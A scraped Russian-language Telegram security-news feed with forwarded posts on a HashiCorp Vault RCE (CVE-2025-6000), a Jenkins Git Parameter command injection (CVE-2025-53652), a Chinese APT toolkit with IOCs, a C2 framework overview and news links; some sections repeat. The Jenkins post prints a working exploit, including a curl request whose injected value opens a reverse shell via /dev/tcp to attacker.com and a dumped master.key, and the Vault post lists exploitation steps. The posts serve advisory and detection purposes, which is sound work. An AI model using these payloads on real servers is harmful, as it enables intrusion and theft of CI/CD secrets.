Forwarded from purple shift
HashiCorp Vault — мощный opensource-инструмент, предназначенный для хранения, управления и защиты доступа к чувствительным данным: паролям, API-ключам, сертификатам. Он централизует работу с секретами, автоматизирует их выдачу и отзыв, а также обеспечивает тонкий контроль доступа в сложных распределённых инфраструктурах. Взаимодействие с Vault возможно через API, веб-интерфейс или CLI, а аутентификация поддерживает широкий спектр методов, включая интеграцию с Kubernetes и облачными платформами.
Однако... в августе этого года в HashiCorp Vault было обнаружено 9 уязвимостей, одна из которых (CVE-2025-6000) критическая (score 9.1). И это первая в истории публично задокументированная RCE-уязвимость в HashiCorp Vault, просуществовавшая 9 лет до исправления.
Уязвимость позволяет привилегированному оператору Vault создать подконтрольный файл аудита и зарегистрировать его как плагин, чтобы получить возможность выполнения произвольного кода.
Для эксплуатации нужно:
0. Иметь root токен. Его получение выходит за рамки данной статьи, однако стоит упомянуть, что связка нескольких CVE даёт возможность это сделать: CVE-2025-6037 позволяет имперсонироваться через уязвимость проверки сертификатов, CVE-2025-5999 позволяет повысить привилегии до root.
Условие является необходимым, так как для создания аудита и регистрации плагина обычно нужны привилегии root.
1. Определить директорию с плагинами. При попытке загрузить несуществующий файл эндпоинт возвращает сообщение об ошибке, которое содержит полный путь к директории. Достаточно отправить
и в ответ получить
Полный путь до директории плагинов нужен для записи файла аудита в эту директорию. А запись именно в этот каталог необходима для последующей загрузки файла в качестве плагина. Плагины могут быть загружены только из этой директории.
2. Записать файл аудита в каталог плагинов. Для этого зарегистрировать аудит с такими параметрами:
Указывается директория с плагинами из предыдущего шага.
Файл аудита должен быть исполняемым (rwxr-xr-x)
Эта часть содержит наш пейлоад. Содержимое префикса будет выполняться при загрузке плагина.
3. Зарегистрировать плагин. Для регистрации плагина необходимо указать его sha256, однако тут есть загвоздка: лог аудита содержит различные временные метки, а также хэшированные данные, предсказать которые практически невозможно. Поэтому для получения точной копии лога аудита, можно предварительно зарегистрировать еще один аудит, транслирующий логи на подконтрольный нам сокет. В этом случае добавляется шаг по удалению аудита с префиксом перед подсчетом sha256.
После регистрации исполняемого файла в качестве плагина, он выполняется от имени пользователя vault.
Как обнаружить эксплуатацию CVE-2025-6000:
1. Корреляция событий из шагов выше явно укажет на попытку эксплуатации:
- Попытка регистрации несуществующего плагина;
- Cоздание аудита с указанием prefix и mode;
- Удаление недавно созданного аудита (также рекомендуем мониторить удаление аудита в принципе, так как это событие само по себе должно вызывать подозрения);
- Регистрация подозрительного плагина.
2. Отслеживайте аномалии в цепочках процессов от vault. Например, запуск скриптов.
Методы защиты:
Уязвимость CVE-2025-6000 исправлена в Vault Community Edition 1.20.1 и Vault Enterprise 1.20.1, 1.19.7, 1.18.12 и 1.16.23.
Поэтому стоит обновиться до этих версий. В исправленных версиях аудит с префиксом требует явного указания в конфигурации vault, а также аудит не может использовать файлы с правами на выполнение (0777, 0755 и т.д.) и не может быть записан в директорию плагинов.
Однако... в августе этого года в HashiCorp Vault было обнаружено 9 уязвимостей, одна из которых (CVE-2025-6000) критическая (score 9.1). И это первая в истории публично задокументированная RCE-уязвимость в HashiCorp Vault, просуществовавшая 9 лет до исправления.
Уязвимость позволяет привилегированному оператору Vault создать подконтрольный файл аудита и зарегистрировать его как плагин, чтобы получить возможность выполнения произвольного кода.
Для эксплуатации нужно:
0. Иметь root токен. Его получение выходит за рамки данной статьи, однако стоит упомянуть, что связка нескольких CVE даёт возможность это сделать: CVE-2025-6037 позволяет имперсонироваться через уязвимость проверки сертификатов, CVE-2025-5999 позволяет повысить привилегии до root.
Условие является необходимым, так как для создания аудита и регистрации плагина обычно нужны привилегии root.
1. Определить директорию с плагинами. При попытке загрузить несуществующий файл эндпоинт возвращает сообщение об ошибке, которое содержит полный путь к директории. Достаточно отправить
POST /v1/sys/plugins/catalog/non_existing_name
и в ответ получить
1 error occurred:\n\t* failed to verify plugin plugin \"non_existing_name\" version \"v1.0.0\": extracted artifact directory not found: /home/vault/vault_plugins/non_existing_name_1.0.0_linux_amd64\n\n
Полный путь до директории плагинов нужен для записи файла аудита в эту директорию. А запись именно в этот каталог необходима для последующей загрузки файла в качестве плагина. Плагины могут быть загружены только из этой директории.
2. Записать файл аудита в каталог плагинов. Для этого зарегистрировать аудит с такими параметрами:
file_path (путь к файлу аудита) = "/home/vault/vault_plugins/script.sh" Указывается директория с плагинами из предыдущего шага.
mode (права на файл аудита) = "0755" Файл аудита должен быть исполняемым (rwxr-xr-x)
prefix (префикс будет добавлен перед каждым логом) = "#!/bin/bash\n(some bash payload)" Эта часть содержит наш пейлоад. Содержимое префикса будет выполняться при загрузке плагина.
3. Зарегистрировать плагин. Для регистрации плагина необходимо указать его sha256, однако тут есть загвоздка: лог аудита содержит различные временные метки, а также хэшированные данные, предсказать которые практически невозможно. Поэтому для получения точной копии лога аудита, можно предварительно зарегистрировать еще один аудит, транслирующий логи на подконтрольный нам сокет. В этом случае добавляется шаг по удалению аудита с префиксом перед подсчетом sha256.
После регистрации исполняемого файла в качестве плагина, он выполняется от имени пользователя vault.
Как обнаружить эксплуатацию CVE-2025-6000:
1. Корреляция событий из шагов выше явно укажет на попытку эксплуатации:
- Попытка регистрации несуществующего плагина;
- Cоздание аудита с указанием prefix и mode;
- Удаление недавно созданного аудита (также рекомендуем мониторить удаление аудита в принципе, так как это событие само по себе должно вызывать подозрения);
- Регистрация подозрительного плагина.
2. Отслеживайте аномалии в цепочках процессов от vault. Например, запуск скриптов.
Методы защиты:
Уязвимость CVE-2025-6000 исправлена в Vault Community Edition 1.20.1 и Vault Enterprise 1.20.1, 1.19.7, 1.18.12 и 1.16.23.
Поэтому стоит обновиться до этих версий. В исправленных версиях аудит с префиксом требует явного указания в конфигурации vault, а также аудит не может использовать файлы с правами на выполнение (0777, 0755 и т.д.) и не может быть записан в директорию плагинов.
Forwarded from Похек
CVE-2025-53652: Jenkins под ударом через Git Parameter
#jenkins #devops #dev #git
Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.
🪲 Суть уязвимости
Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.
Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2
#️⃣ Техническая механика атаки
➡️ Цепочка эксплуатации
Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.
➡️ Практический эксплойт
❗️ Масштаб проблемы
VulnCheck провел анализ интернет-экспозиции Jenkins:
15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".
ℹ️ Требования для эксплуатации
➡️ Аутентифицированные атаки
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен
➡️ Неаутентифицированные атаки
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи
❗️ Реальное воздействие
➡️ В случае успешного похека
➡️ Потенциальные последствия
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре
❗️ Митигация и защита
➡️ Немедленные действия
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:
3. Аудит конфигурации — отключить ненужные плагины
➡️ Долгосрочная стратегия
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры
Источники:
🔗 VulnCheck Analysis
🔗 Jenkins Security Advisory
🔗 CVE-2025-53652 NVD
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#jenkins #devops #dev #git
Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.
Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.
Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2
# Нормальный параметр
BRANCH_PARAM = "master"
# Выполняется: git rev-parse --resolve-git-dir /path/master/.git
# Вредоносный параметр
BRANCH_PARAM = "$(sleep 80)"
# Выполняется: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git
# Результат: команда sleep выполняется как дочерний процесс
Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.
# Reverse shell через curl
curl -kv 'http://jenkins:8080/job/buildName/build' -X POST \
-H 'Cookie: [cookie]' \
--data-urlencode 'Jenkins-Crumb=[crumb]' \
--data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"$(bash -c \"bash &> /dev/tcp/attacker.com/12700 <&1\")"}}'
VulnCheck провел анализ интернет-экспозиции Jenkins:
| Категория | Количество серверов | Риск|
|------------------------|---------------------|-------------|
| Требуют аутентификации | 100,000+ | Средний |
| Открытая регистрация | ~1,000 | Высокий |
| Без аутентификации | ~15,000 | Критический |
15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи
# Получение необходимых данных
curl -kv http://target:8080/ -o /dev/null # Получить cookie
curl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep "data-crumb-value="
# Результат эксплуатации
$ nc -lvnp 1270
Connection received on 172.18.0.3 55664
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
$ cat ~/secrets/master.key
05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:
-Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true
3. Аудит конфигурации — отключить ненужные плагины
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры
Источники:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Unit 42 обнаружили новый китайский nexus-APT, обозначенный Phantom Taurus.
Быстрая картина атак (high-level flow)
• Первичное проникновение — web-shell / уязвимый IIS endpoint (часто OutlookEN.aspx как загрузчик).
• Загрузка в память IIServerCore (fileless) → поддержка динамической загрузки .NET-ассемблей (AssemblyExecuter).
• Пост-эксплуатация — поиск нужной информации: сначала email-theft, в 2025 — сдвиг в сторону целевых SQL-дампов через
mssq.bat и WMI-исполнение.• Экфильтрация — зашифрованные C2 (AES), память-только payloads, timestomp / изменение дат для сокрытия следов.
🛠️ Основной тулкит (подборка)
• NET-STAR suite: IIServerCore, AssemblyExecuter v1, AssemblyExecuter v2 (v2 — AMSI & ETW bypass).
• Вспомогательные/известные инструменты в наборе TTP: China Chopper, JuicyPotato/SharpEfsPotato, Impacket, Mimikatz, TunnelSpecter, SweetSpecter и др. (см. Appendix A в отчёте).
Что делает NET-STAR (технически)
• IIServerCore — модульный fileless backdoor: загружается через ASPX web-shell (OutlookEN.aspx), держится в
w3wp.exe, принимает команды, загружает .NET-assemblies из Base64, выполняет в памяти, шифрует ответ AES, поддерживает timestomp/changeLastModified.• AssemblyExecuter v1 — in-memory загрузка и исполнение .NET-assemblies (минимальная «шумность» для AV).
AssemblyExecuter v2 — как v1 + методы обхода AMSI/ETW; применение обходов динамически по параметрам.
• Наличие ASPX-файлов с встроенным Base64-блоком (особенно OutlookEN.aspx или похожие имена).
•
w3wp.exe с нетипичной динамической загрузкой .NET-ассемблей (Assembly.Load / Reflection / Invoke), особенно если командный поток содержит STAR-delimited Base64.• Необычные модификации timestamps (файлы с будущими датами, timestomp).
• Команды на исполнение SQL через WMI (запуски
mssq.bat, sqlcmd под контекстом удалённого выполнения).
• Фокус — memory only поведения: инструменты типа Sysmon + ETW/Process-Create/ModuleLoad + EDR memory-callbacks помогут увидеть Assembly.Load и динамическое Reflection.
• Коррелируйте ASPX-загрузки с сетевыми запросами к ненормальным C2 и с последующими WMI-вызовами (вспышка
wmic process call create / win32_process выполняющие mssq.bat). Проактивно просканируйте webroot на ASPX с Base64 и сравните SHA/текстовые отпечатки с known-IOCs.
IOCs (средне/высокая степень уверенности)
SHA256:
1. IIServerCore (ServerCore.dll):
eeed5530fa1cdeb69398dc058aaa01160eab15d4dcdcd6cb841240987db284dc.2. AssemblyExecuter V1 (ExecuteAssembly.dll):
3e55bf8ecaeec65871e6fca4cb2d4ff2586f83a20c12977858348492d2d0dec4.3. AssemblyExecuter V2 (ExecuteAssembly.dll):
afcb6289a4ef48bf23bab16c0266f765fab8353d5e1b673bd6e39b315f83676e and b76e243cf1886bd0e2357cbc7e1d2812c2c0ecc5068e61d681e0d5cff5b8e038.(Добавьте эти SHA в EDR/AV/IOC-feeds; ищите совпадения в внутренней телеметрии.)
Быстрая тактика реагирования (playbook bullets)
• Изолируйте и снимите дамп
w3wp.exe при подозрении на in-memory .NET-загрузку.Соберите веб-корень (ASPX) и сделайте хеши/стринг-анализ (ищем Base64, STAR-delimiter).
• Проверьте WMI-журналы на remote WMI execution и поиск
mssq.bat/sql-вызовов.• Проанализируйте сетевой трафик на AES-зашифрованные POST/GET с нестандартными параметрами и STAR-делимитером.
• Удалите/ресторите компрометированные web-файлы, обновите веб-серверы, примените правила Web Application Firewall для блокировки подозрительных ASPX загрузок.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
В сети появился китайский ИИ-инструмент для пентестинга
В сети начали распространять новый инструмент для пентестинга под названием Villager, связанный с подозрительной китайской компанией и описанный исследователями как «преемник Cobalt Strike на базе...
🔗Ссылка:
https://habr.com/ru/news/946562/
https://habr.com/ru/news/946562/
Forwarded from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
➡️ Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
➡️ Обзор Adaptix C2
▪️ Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
▪️ Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
🔗 blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Взлом внутреннего GitLab-сервера Red Hat
Хакерская группа Crimson Collective заявила о получении доступа к одному из внутренних GitLab-серверов компании Red Hat и загрузке с него 570ГБ сжатых данных, содержащих информацию из 28 тысяч репозиториев. Среди прочего в захваченных данных присутствовало…
🔗Ссылка:
https://opennet.ru/63986/
https://opennet.ru/63986/
www.opennet.ru
Уязвимость в Red Hat OpenShift AI, допускающая root-доступ к узлам кластера
В платформе OpenShift AI Service, позволяющей организовать работу кластера для выполнения и обучения AI-моделей, выявлена уязвимость (CVE-2025-10725), позволяющая непривилегированному пользователю получить права администратора кластера. После успешной атаки…
🔗Ссылка:
https://opennet.ru/63991/
https://opennet.ru/63991/
www.opennet.ru
Выпуск Raspberry Pi OS, переведённый на пакетную базу Debian 13
Разработчики проекта Raspberry Pi представили новую версию дистрибутива Raspberry Pi OS 2025-10-01 (Raspbian), основанного на пакетной базе Debian 13. В репозитории доступно около 35 тысяч пакетов. Среда рабочего стола базируется на композитном сервере labwc…
🔗Ссылка:
https://opennet.ru/63995/
https://opennet.ru/63995/